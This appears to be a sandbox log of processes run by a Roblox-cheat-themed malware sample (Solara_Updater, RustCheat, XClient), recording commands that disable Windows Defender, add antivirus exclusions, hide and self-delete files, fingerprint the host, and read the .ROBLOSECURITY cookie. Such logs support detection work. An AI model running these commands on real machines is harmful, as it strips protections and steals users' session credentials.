C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

